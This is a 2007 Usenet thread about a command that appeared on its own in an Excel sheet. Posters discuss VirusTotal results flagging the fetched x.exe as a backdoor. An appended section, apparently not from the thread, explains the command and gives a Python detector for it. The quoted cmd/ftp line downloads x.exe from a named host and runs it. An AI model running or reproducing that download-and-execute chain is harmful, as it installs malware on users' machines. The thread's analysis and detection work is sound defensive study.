From: Ron Lopshire on
Axel Hammerschmidt wrote:

> Ayatollah Yootweiss Al-Reddi <ddotbudd(a)man.ac.uk> wrote:
>
> <snip>
>
>>You didn't attempt to delete x.exe?
>
> No, but I do regret not getting a copy, e-mailing it to my Hotmail
> account and let their anti-virus scan it to see if it really was a
> virus.

Why would you want to do that, Axel?

Submit suspicious samples to VT or Jotti.

Virus Total Online Scan
(http://www.virustotal.com/)
Jotti's Online Malware Scan
(http://virusscan.jotti.org/)
Kaspersky File Scanner
(http://www.kaspersky.com/scanforvirus)
Norman SandBox
(http://sandbox.norman.no/live.html)
Dr.Web
(http://support.drweb.com/sendnew/)

Most AV vendors provide for the email submission of samples, but in most
cases, only in password-protected archives (zip files). Sending a raw
malware sample using email is almost never a good idea.

Ron :)
From: Axel Hammerschmidt on
Ron Lopshire <notron(a)ovbl.org> wrote:

> Axel Hammerschmidt wrote:
>
> > Ayatollah Yootweiss Al-Reddi <ddotbudd(a)man.ac.uk> wrote:
> >
> > <snip>
> >
> >>You didn't attempt to delete x.exe?
> >
> > No, but I do regret not getting a copy, e-mailing it to my Hotmail
> > account and let their anti-virus scan it to see if it really was a
> > virus.
>
> Why would you want to do that, Axel?

<snip>

I would never let anyone scan my computer.
From: Axel Hammerschmidt on
Ayatollah Yootweiss Al-Reddi <ddotbudd(a)man.ac.uk> wrote:

> In article <1hupq5s.asg9om1qckmgN%hlexa(a)hotmail.com>,
> hlexa(a)hotmail.com says...
>
> > Ayatollah Yootweiss Al-Reddi <ddotbudd(a)man.ac.uk> wrote:
> >
> > <snip>
> >
> > > You didn't attempt to delete x.exe?
> >
> > No, but I do regret not getting a copy, e-mailing it to my Hotmail
> > account and let their anti-virus scan it to see if it really was a
> > virus.
> >
> That's what I meant, of course. Did I say delete? Dearie dear,
> that would be irresponsible.

I probably broke some law by just logging on to the site.
From: David W. Hodgins on
On Sat, 10 Mar 2007 10:49:16 -0500, Ron Lopshire <notron(a)ovbl.org> wrote:

> As I said, if you suspect a file, submit it to VT or Jotti.

AntiVir was the only one detecting it via heuristics when I first checked.
Panda had added it, when I checked yesterday, and Kaspersky today.

Regards, Dave Hodgins

Complete scanning result of "x.exe", received in VirusTotal at 03.10.2007, 22:52:23 (CET).
Antivirus Version Update Result
AntiVir 7.3.1.41 03.10.2007 HEUR/Crypted
Authentium 4.93.8 03.09.2007 no virus found
Avast 4.7.936.0 03.09.2007 no virus found
AVG 7.5.0.447 03.10.2007 no virus found
BitDefender 7.2 03.10.2007 no virus found
CAT-QuickHeal 9.00 03.10.2007 no virus found
ClamAV devel-20060426 03.10.2007 no virus found
DrWeb 4.33 03.10.2007 no virus found
eSafe 7.0.14.0 03.08.2007 no virus found
eTrust-Vet 30.6.3469 03.10.2007 no virus found
Ewido 4.0 03.10.2007 no virus found
FileAdvisor 1 03.10.2007 no virus found
Fortinet 2.85.0.0 03.10.2007 no virus found
F-Prot 4.3.1.45 03.09.2007 no virus found
F-Secure 6.70.13030.0 03.09.2007 no virus found
Ikarus T3.1.1.3 03.10.2007 no virus found
Kaspersky 4.0.2.24 03.10.2007 Backdoor.Win32.IRCBot.aac
McAfee 4981 03.09.2007 no virus found
Microsoft 1.2306 03.10.2007 no virus found
NOD32v2 2106 03.10.2007 no virus found
Norman 5.80.02 03.10.2007 no virus found
Panda 9.0.0.4 03.10.2007 Trj/Downloader.NFL
Prevx1 V2 03.10.2007 no virus found
Sophos 4.15.0 03.10.2007 no virus found
Sunbelt 2.2.907.0 03.10.2007 no virus found
Symantec 10 03.10.2007 no virus found
TheHacker 6.1.6.073 03.09.2007 no virus found
UNA 1.83 03.09.2007 no virus found
VBA32 3.11.2 03.10.2007 no virus found
VirusBuster 4.3.19:9 03.10.2007 no virus found

Aditional Information
File size: 540672 bytes
MD5: a6c18002d028be5616438f41a35df29c
SHA1: 62cfa9ccf848c7a5187f82d4a19da79344deaea1

--
Change nomail.afraid.org to ody.ca to reply by email.
(nomail.afraid.org has been set up specifically for
use in usenet. Feel free to use it yourself.)
From: Axel Hammerschmidt on
davanzati <davanzatiusa(a)gmail.com> wrote:

> Hi all,
>
> I was working in an excel document, when I noticed that the selected
> cell was moving itself. Then suddenly, one letter at a time, this
> line typed itself in:
>
> cmd /c echo open www.powersofthosting.com 21 >> ik &echo user mainston
> powersoft >> ik &echo binary >> ik &echo get x.exe >> ik &echo bye >>
> ik &ftp -n -v -s:ik &del ik &x.exe &exit

What is "ik" and -s:ik there for?

And why these two?

: -n
:
: Restrains ftp from attempting "auto-login" upon initial
: connection. If auto-login is enabled, ftp will check the .netrc
: (see below) file in the user's home directory for an entry
: describing an account on the remote machine. If no entry
: exists, ftp will prompt for the remote machine login name
: (default is the user identity on the local machine), and, if
: necessary, prompt for a password and an account with which to
: login.
:
: -v
:
: Enable verbose and progress. This is the default if output is
: to a terminal (and in the case of progress, ftp is the
: foreground process). Forces ftp to show all responses from the
: remote server, as well as report on data transfer statistics.
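
The command line quoted above appends FTP commands to a scratch file (`ik`), runs Windows `ftp` with `-s:ik` so that it reads its commands from that file, then deletes the file and runs the downloaded `x.exe`. As an added example (not written by anyone in this thread), the Python check below rebuilds echo-written FTP scripts from a logged command line and flags that download-and-run chain; the `analyze` function and the benign sample are assumptions made for illustration.

```python
import re

# Command line quoted in the thread, re-joined from its wrapped lines.
THREAD_CMD = ("cmd /c echo open www.powersofthosting.com 21 >> ik &echo user mainston "
              "powersoft >> ik &echo binary >> ik &echo get x.exe >> ik &echo bye >> "
              "ik &ftp -n -v -s:ik &del ik &x.exe &exit")
# Constructed benign sample: echo-to-file with no ftp script involved.
BENIGN_CMD = "cmd /c echo build ok >> log.txt &type log.txt"

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*>>?\s*(\S+)$", re.I)
FTP_SCRIPT_RE = re.compile(r"^ftp(?:\.exe)?\b.*?\s-s:(\S+)", re.I)

def analyze(cmdline):
    """Rebuild echo-written files and report an 'ftp -s:' download-and-run chain."""
    body = re.sub(r"^\s*cmd(?:\.exe)?\s+/c\s+", "", cmdline, flags=re.I)
    steps = [s.strip() for s in body.split("&") if s.strip()]
    written = {}  # file name -> lines appended to it by echo
    finding = {"script": None, "host": None, "fetched": [], "executed": [],
               "script_deleted": False}
    for step in steps:
        m = ECHO_RE.match(step)
        if m:
            written.setdefault(m.group(2).lower(), []).append(m.group(1))
            continue
        m = FTP_SCRIPT_RE.match(step)
        if m and m.group(1).lower() in written:
            # Windows ftp takes its commands from the file named by -s:
            finding["script"] = m.group(1)
            for line in written[m.group(1).lower()]:
                verb, *args = line.split() or [""]
                if verb.lower() == "open" and args:
                    finding["host"] = args[0]
                elif verb.lower() == "get" and args:
                    finding["fetched"].append(args[-1].lower())
            continue
        first = step.split()[0].lower()
        if first in ("del", "erase") and finding["script"] in step.split()[1:]:
            finding["script_deleted"] = True   # script removed after use
        elif first in finding["fetched"]:
            finding["executed"].append(first)  # a fetched file is run directly
    finding["suspicious"] = bool(finding["script"] and finding["executed"])
    return finding

if __name__ == "__main__":
    print(analyze(THREAD_CMD))
    print(analyze(BENIGN_CMD))
```

The same function can be run over process-creation or shell-history logs, one command line per call, alerting when `suspicious` is true.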